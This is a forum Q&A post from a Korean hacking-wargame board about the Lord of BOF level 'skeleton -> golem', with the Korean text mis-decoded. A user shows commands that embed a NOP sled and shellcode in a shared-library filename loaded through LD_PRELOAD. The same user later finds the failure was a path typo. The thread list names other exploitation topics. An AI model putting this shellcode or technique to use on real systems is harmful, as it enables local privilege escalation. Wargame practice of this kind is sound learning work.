½Ã½ºÅÛ ÇØÅ·

 1574, 2/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   turttle2s
   [ LOB ] skeleton -> golem

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1973 [º¹»ç]


LD_PRELOAD¸¦ ÀÌ¿ëÇÏ¿© ¹®Á¦¸¦ ÇØ°áÇÏ·Á°í ÇÕ´Ï´Ù.


[skeleton@localhost workspace]$ gcc -fPIC -shared -o `python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"\x90"*50'`.so temp.c
// °øÀ¯ ¶óÀ̺귯¸® »ý¼º

[skeleton@localhost workspace]$ export LD_PRELOAD="/home/skeleton/workpsace/`python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"\x90"*50'`.so"
// °øÀ¯ ¶óÀ̺귯¸® µî·Ï


[skeleton@localhost workspace]$ export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/home/skeleton/workspace
// °øÀ¯ ¶óÀ̺귯¸® °æ·Î ¼³Á¤



ÀÌ ´ÙÀ½ºÎÅÍ´Â ¾î¶² ¸í·ÉÀ» Çصµ ¿¡·¯°¡ ¶å´Ï´Ù..

[skeleton@localhost workspace]$ ll
ls: error in loading shared libraries: /home/skeleton/workpsace/鐞1ɱ2lÿ瀵󬩪ÿÿÿ2i00tii0cjo㐔⚱
                                                                                           ΁.so: cannot open shared object file: No such file or directory

[skeleton@localhost workspace]$ gdb -q golem
gdb: error in loading shared libraries: /home/skeleton/workpsace/鐞1ɱ2lÿ瀵󬩪ÿÿÿ2i00tii0cjo㐔⚱
                                                                                            ΁.so: cannot open shared object file: No such file or directory



°øÀ¯ ¶óÀ̺귯¸® °æ·Î¸¦ Á¤ÇØÁÖÁö ¾ÊÀ¸¸é Àú·± ¿¡·¯°¡ ¶á´Ù°í Çؼ­ °æ·Î±îÁö ¼³Á¤ÇØÁá´Âµ¥ °è¼Ó ¿¡·¯°¡ ¶å´Ï´Ù.

ÀÌÀ¯¸¦ ¸ð¸£°Ú½À´Ï´Ù..  ¿ÖÀÌ·¯´Â°É±î¿ä?

  Hit : 1549     Date : 2019/08/21 09:26



    
turttle2s ¿ÀŸ¸¦ Á¶½ÉÇսôÙ. 2019/08/21  
turttle2s ¸ÁÇÒ ¿ÀŸ 2019/08/21  
turttle2s ¿ÀŸ¶§¹®ÀÌ¿´³×¿ä ¤Ð 2019/08/21  
1554   [LOB Redhat] succubus -> nightmare[3]     turttle2s
09/26 1649
1553   read()·Î got leakÀÌ °¡´ÉÇÑ°¡¿ä?[1]     turttle2s
09/26 1651
1552   pwntools ¾²½Ã´Â ºÐµé ~[6]     turttle2s
09/17 1865
1551   system("/bin/sh") ¿Í execve("/bin/sh",0,0)[2]     turttle2s
09/16 2374
1550   ROP Áú¹®ÀÔ´Ï´Ù[2]     turttle2s
09/09 2104
1549   BOF¸¦ ÇÏ´Â ÀÌÀ¯°¡ ¹«¾ùÀΰ¡¿ä?[7]     turttle2s
09/03 2353
1548   rop ´ÙÀ½¿¡ ¹¹¸¦ °øºÎÇÏ´Â°Ô ÁÁÀ»±î¿ä?[1]     tloet
08/26 1991
  [ LOB ] skeleton -> golem[3]     turttle2s
08/21 1548
1546   Á¦°¡ ½Ã½ºÅÛ ÇØÅ·ÂÊÀ¸·Î °¡º¸·Á ÇÕ´Ï´Ù.[3]     gun7935
08/01 1977
1545   PLT GOT Áú¹®[3]     turttle2s
07/30 1491
1544   setreuidÇÔ¼ö¿Í setuidºñÆ® °ü°è[1]     park345601
07/26 1332
1543   lob remote bof[6]     park345601
07/25 1422
1542   pwntools ¸¦ ÀÌ¿ëÇÑ exploit ÄÚµå Áú¹®[3]     turttle2s
06/07 1498
1541   Á»ºñ ¹ÙÀÌ·¯½º ¹®ÀÇ °Ç[1]     kirr2
04/14 1819
1540     [re] Á»ºñ ¹ÙÀÌ·¯½º ¹®ÀÇ °Ç     ÇѽÂÀç
05/23 1380
1539   ¹é½Å¿ìȸÁú¹®µå¸³´Ï´Ù (¾Ç¿ë¸ñÀû¾Æ´Ï¿¡¿ë)[3]     kangyung0447
03/01 2018
1538   pythonÀ¸·Î ÀÎÀÚ¸¦ ³ÖÀ» ¶§[1]     turttle2s
02/23 1558
1537   GOT Overwrite[6]     turttle2s
01/31 1840
1536   RTL Áú¹® ÀÔ´Ï´Ù[4]     turttle2s
01/11 2732
1535   iptime a3004nd uart¸¦ ÅëÇÑ ½© Á¢±Ù ½Ãµµ Áú¹®µå¸³´Ï´Ù.[1]     cho6206
12/30 3971
[1] 2 [3][4][5][6][7][8][9][10]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org